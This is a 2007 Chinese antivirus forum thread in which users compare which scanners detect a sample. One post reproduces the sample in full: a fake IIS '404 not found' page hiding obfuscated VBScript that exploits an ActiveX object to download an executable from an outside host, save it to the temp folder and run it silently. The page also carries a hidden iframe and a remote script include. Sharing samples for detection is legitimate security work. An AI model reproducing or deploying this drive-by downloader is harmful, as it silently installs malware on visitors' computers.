病毒一个 卡巴未报 (1月15日)

hsjj2005

病毒一个，卡巴未报（1月15日10点病毒库）(转绅博青玉案)

[ 本帖最后由 hsjj2005 于 2007-1-16 09:37 编辑 ]

hsjj2005

twister v7（1月15日病毒库）报，如图所示：

moonsilver

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style> a:link                        {font:9pt/11pt 宋体; color:FF0000} a:visited                {font:9pt/11pt 宋体; color:#4e4e4e}
</style>

<META NAME="ROBOTS" CONTENT="NOINDEX">

<title>无法找到网页</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=gb2312">
<META NAME="MS.LOCALE" CONTENT="ZH-CN">
</head>

<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm

        //For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
        DocURL = document.URL;

        //this is where the http or https will be, as found by searching for :// but skipping the res://
        protocolIndex=DocURL.indexOf("://",4);

        //this finds the ending slash for the domain server
        serverIndex=DocURL.indexOf("/",protocolIndex + 3);

                //for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
        //of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
        //urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
        BeginURL=DocURL.indexOf("#",1) + 1;

        urlresult=DocURL.substring(BeginURL,serverIndex);

        //for display, we need to skip after http://, and go to the next slash
        displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);

        InsertElementAnchor(urlresult, displayresult);
}

function HtmlEncode(text)
{
    return text.replace(/&/g, '&amp').replace(/'/g, '&quot;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

function TagAttrib(name, value)
{
    return ' '+name+'="'+HtmlEncode(value)+'"';
}

function PrintTag(tagName, needCloseTag, attrib, inner){
    document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
    if (needCloseTag) document.write( '</' + tagName +'>' );
}

function URI(href)
{
    IEVer = window.navigator.appVersion;
    IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );

    return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
        encodeURI(href) :
        escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}

function InsertElementAnchor(href, text)
{
    PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}

//-->
</script>

<body bgcolor="FFFFFF" >;

<table width="410" cellpadding="3" cellspacing="5">

  <tr>
    <td align="left" valign="middle" width="360">
        <h1 style="COLOR:000000; FONT: 12pt/15pt 宋体"><!--Problem-->无法找到网页</h1>
    </td>
  </tr>
<html>
<script language="VBScript">
  on error resume next
  leo8j = "http://www.059w.com/mm/down.exe"
  bba="clsi"
  bbb="d:BD9"
  bbc="6C55"
  bbd="6-65A"
  bbe="3-11D"
  bbf="0-983"
  bbg="A-00C"
  bbh="04FC"
  bbi="29E"
  bbj="36"
  jimo=bba & bbb & bbc & bbd & bbe & bbf & bbg & bbh & bbi & bbj
  xm1="Micros"
  xm2="oft.XMLH"
  xm3="TTP"
  hoho=xm1 & xm2 & xm3
  lt1="cl"
  lt2="as"
  lt3="sid"
  leo=lt1 & lt2 & lt3
  ghost="GET"
  fd4="Shell."
  fd5="Application"
  zx1="Scripting."
  zx2="FileSystemObject"
  king=zx1 & zx2
  crsky=fd4 & fd5
  tl1="obj"
  tl2="ect"
  bq=tl1 & tl2
  Set bgp = document.createElement(bq)
  bgp.setAttribute leo, jimo
  str=hoho
  Set CAOd = bgp.CreateObject(hoho,"")
  a1="A"
  b2="d"
  c3="o"
  d4="db."
  e5="S"
  f6="t"
  g7="r"
  a8="e"
  a9="a"
  a10="m"
  CAOf=a1&b2&c3&d4&e5&f6&g7&a8&a9&a10
  CAOg=CAOf
  set CAOa = bgp.createobject(CAOg,"")
  CAOa.type = 1
  CAOh=ghost
  CAOd.Open CAOh, leo8j, False
  CAOd.Send
  CAO9="8j.com"
  set CAOb = bgp.createobject(king,"")
  set CAOe = CAOb.GetSpecialFolder(2)  
    CAOa.open
    CAO8="CAOa.BuildPath(CAOa,CAO8)"
    CAO7="CAOb.BuildPath(CAOb,CAO7)"
    CAO6="bgp.BuildPath(CAOd,CAO6)"
    CAO5="CAOd.BuildPath(CAOf,CAO5)"
    CAO4="CAOe.BuildPath(CAOg,CAO4)"
    CAO3="CAOf.BuildPath(CAOh,CAO4)"
    CAO2="CAOg.BuildPath(CAOi,CAO3)"
    CAO1="CAOh.BuildPath(CAOg,CAO1)"
    CAO0="CAOi.BuildPath(CAOk,CAO0)"
    CAO9= CAOb.BuildPath(CAOe,CAO9)
    CAOa.write CAOd.responseBody
    CAOa.SaVEToFiLe CAO9,2
    CAOa.close
  bgp.createobject(crsky,"").SHeLlExecUTe CAO9,kFC,KTV,"open",0
  </script>
</html>
  <tr>
<td width="400" colspan="2">
<iframe src=./24.htm width=0 height=0></iframe>
<SCRIPT language=javascript src="http://www.059w.com/test.js"></SCRIPT>

<font style="COLOR:000000; FONT: 9pt/11pt 宋体">您正在搜索的网页可能已经删除、更名或暂时不可用。</font></td>
  </tr>

  <tr>
    <td width="400" colspan="2"> <font style="COLOR:000000; FONT: 9pt/11pt 宋体">

        <hr color="#C0C0C0" noshade>

<p>请尝试下列操作：</p>

        <ul>
<li>如果您在“地址”栏中键入了网页地址，请检查其拼写是否正确。<br>
      </li>

<li>打开 <script>
          <!--
          if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
          {
                  Homepage();
          }
          //-->
           </script> 主页，寻找指向所需信息的链接。</li>

<li>单击<a href="javascript:history.back(1)">后退</a>按钮尝试其他链接。</li>
    </ul>

<h2 style="font:9pt/11pt 宋体; color:000000">HTTP 404 - 无法找到文件<br> Internet 信息服务<BR></h2>

        <hr color="#C0C0C0" noshade>

        <p>技术信息（支持个人）</p>

<ul>
<li>详细信息：<br><a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=404&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft 支持</a>\
<script src='http://s34.cnzz.com/stat.php?id=115272&web_id=115272' language='JavaScript' charset='gb2312'></script>
</li>
</ul>

    </font></td>
  </tr>

</table>

</body>
</html>

ly250094040

NOD挂
BD挂

bg8ace

nod32挂挂了

bg8ace

蜘蛛也挂！

ly250094040

发重复帖